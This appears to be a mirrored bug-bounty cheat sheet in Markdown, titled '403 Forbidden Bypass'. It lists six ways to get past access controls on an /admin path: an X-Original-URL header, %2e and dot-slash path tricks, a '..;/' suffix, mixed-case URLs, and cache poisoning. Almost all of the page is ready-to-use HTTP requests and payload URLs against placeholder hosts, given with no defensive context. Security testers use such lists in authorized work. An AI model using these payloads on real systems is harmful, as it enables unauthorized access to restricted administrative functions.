mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-24 21:35:25 +00:00
62 lines
963 B
Markdown
62 lines
963 B
Markdown
# 403 Forbidden Bypass
|
||
|
||
1. Using "X-Original-URL" header
|
||
```
|
||
GET /admin HTTP/1.1
|
||
Host: target.com
|
||
```
|
||
Try this to bypass
|
||
```
|
||
GET /anything HTTP/1.1
|
||
Host: target.com
|
||
X-Original-URL: /admin
|
||
```
|
||
|
||
2. Appending **%2e** after the first slash
|
||
```
|
||
http://target.com/admin => 403
|
||
```
|
||
Try this to bypass
|
||
```
|
||
http://target.com/%2e/admin => 200
|
||
```
|
||
|
||
3. Try add dot (.) and slash (/) in the URL
|
||
```
|
||
http://target.com/admin => 403
|
||
```
|
||
Try this to bypass
|
||
```
|
||
http://target.com/admin/. => 200
|
||
http://target.com//admin// => 200
|
||
http://target.com/./admin/./ => 200
|
||
```
|
||
|
||
4. Add "..;/" after the directory name
|
||
```
|
||
http://target.com/admin
|
||
```
|
||
Try this to bypass
|
||
```
|
||
http://target.com/admin..;/
|
||
```
|
||
|
||
|
||
5. Try to uppercase the alphabet in the url
|
||
```
|
||
http://target.com/admin
|
||
```
|
||
Try this to bypass
|
||
```
|
||
http://target.com/aDmIN
|
||
```
|
||
|
||
6. Via Web Cache Poisoning
|
||
```
|
||
GET /anything HTTP/1.1
|
||
Host: victim.com
|
||
X-Original-URL: /admin
|
||
```
|
||
|
||
Source: [@iam_j0ker](https://twitter.com/iam_j0ker)
|